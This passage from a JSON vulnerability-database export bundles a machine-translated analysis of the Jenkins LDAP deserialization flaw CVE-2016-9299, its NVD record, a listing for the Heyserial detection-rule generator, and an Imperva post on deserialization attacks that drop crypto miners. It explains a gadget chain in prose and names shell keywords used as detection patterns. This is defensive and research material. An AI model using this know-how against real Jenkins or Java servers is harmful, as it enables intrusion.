LdapAttribute class. Exploiting this vulnerability requires no authentication, yet it yields arbitrary code execution, so the impact is obvious.\n\n### Vulnerability analysis\n\nFrom the official description and the payload shown later, the problem involves net. sf. json and com. sun. jndi. ldap. LdapAttribute. Analysing the LdapAttribute class shows that the following two methods are the root of the deserialization trigger (for background on LDAP deserialization, see the BlackHat 2016 paper \u201cus-16-Munoz-A-Journey-From-the JNDI-LDAP-Manipulation-To-RCE\u201d):\n\n* getAttributeSyntaxDefinition\n* getAttributeDefinition\n\nBoth methods execute the code fragment _DirContext schema = getBaseCtx(). getSchema(rdn);_, and getBaseCtx() is defined as follows:\n\n![](/Article/UploadPic/2017-2/201724165543569.png)\n\nThis code accesses the LDAP service through JNDI, and we control the Context. PROVIDER_URL parameter, which means we control the address of the LDAP server that JNDI connects to.\n\ngetSchema(rdn) eventually calls com. sun. jndi. ldap. LdapBindingEnumeration. createItem(String, Attributes, Vector); the call chain is long, so debug it yourself. The method is defined as in the following figure:\n\n![](/Article/UploadPic/2017-2/201724165544831.png)\n\nThis method eventually calls Obj. decodeObject(attrs), which performs the object deserialization. A brief note: com. sun. jndi. ldap. Obj defines several methods for object serialization and deserialization, including direct deserialization as well as loading classes directly from a remote location. The difference here from ordinary deserialization is that we cannot load objects remotely, because com. sun. jndi. ldap. VersionHelper12. 
trustURLCodebase defaults to false, which restricts the class loader to classes already on the classpath (no remote codebase loading). How to construct an object that achieves arbitrary code execution during the LDAP deserialization is covered below.\n\nNow that we know the com. sun. jndi. ldap. LdapAttribute methods can trigger the deserialization exploit, the next task is to find a class whose own deserialization calls the triggering function, i.e. one that invokes getAttributeSyntaxDefinition or getAttributeDefinition during deserialization. From the BlackHat slides and the published gadgets, a little analysis shows that the net. sf. json library contains a place where any getXXX method of a class can be called, so the getXXX methods of com. sun. jndi. ldap. LdapAttribute can presumably be reached the same way. First we determine exactly which class and method call the getXXX function: from the json payload in the gadgets, the function that ultimately calls the object's getXXX methods is net. sf. json. JSONObject. defaultBeanProcessing(Object, JsonConfig), shown in the figure below.\n\nThe two circled places in the figure are where the getXXX functions are called: it first enumerates all of the JavaBean's properties and then calls the getters one by one.\n\nHaving figured out the root of the function call, the next step is to find exactly what triggers this function. With Eclipse we can easily find the following call.\n\n![](/Article/UploadPic/2017-2/201724165544409. 
png)\n\nAs shown in the above figure, we can see defaultBeanProcessing method will eventually be ConcurrentSkipListSet class in the equals method calls, to many people here might ask, so many call the relationship, why are you just looking for this class's equals method here might have some experience on the inside, because for and the equals method associated things too much, for java in some data structure, such as a Set,each time adding the element of time will determine whether the current key is present, there is compare whether two objects are equal when to call the hashcode and equals method, here if know through other deserialization of the students on this may be slightly touched, such as the jdk that deserialization of the trigger process. If this experience is not the case, then you can only one one to find.\n\n**[1] [[2]](<83274_2.htm>) [[3]](<83274_3.htm>) [[4]](<83274_4.htm>) [next](<83274_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-04T00:00:00", "type": "myhack58", "title": "Jenkins-LDAP (CVE-2016-9299) deserialization vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-02-04T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83274.htm", "id": "MYHACK58:62201783274", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T16:19:22", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T23:59:00", "type": "cve", "title": "CVE-2016-9299", "cwe": ["CWE-90"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/a:jenkins:jenkins:2.19.2", "cpe:/o:fedoraproject:fedora:25", "cpe:/a:jenkins:jenkins:2.31"], "id": "CVE-2016-9299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.19.2:*:*:*:lts:*:*:*", 
"cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.31:*:*:*:-:*:*:*"]}], "kitploit": [{"lastseen": "2022-05-12T21:31:10", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. 
_(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \\(forked\\)\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> 
\"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of 
Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? 
Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", 
"CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. 
The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an 
instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No 
\nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes 
\nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Cognos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. We also saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen from the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using the \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. A few interesting notes can be made by examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicates that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d; this means that \u201cwget\u201d will have no output to the console, hence it will be harder to notice that such a request was even made. 
Once the downloaded script runs, the server is infected with crypto mining malware that tries to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and PowerShell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux servers, each with its own designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown in the image below is a variable that defines an internal field separator, which in this case simply holds a space character. 
The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers and sends an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with crypto mining malware by using an insecure deserialization vulnerability. However, insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time in the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts, which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. 
Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "edition": 2, "cvss3": {}, "published": "2018-01-24T17:45:08", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
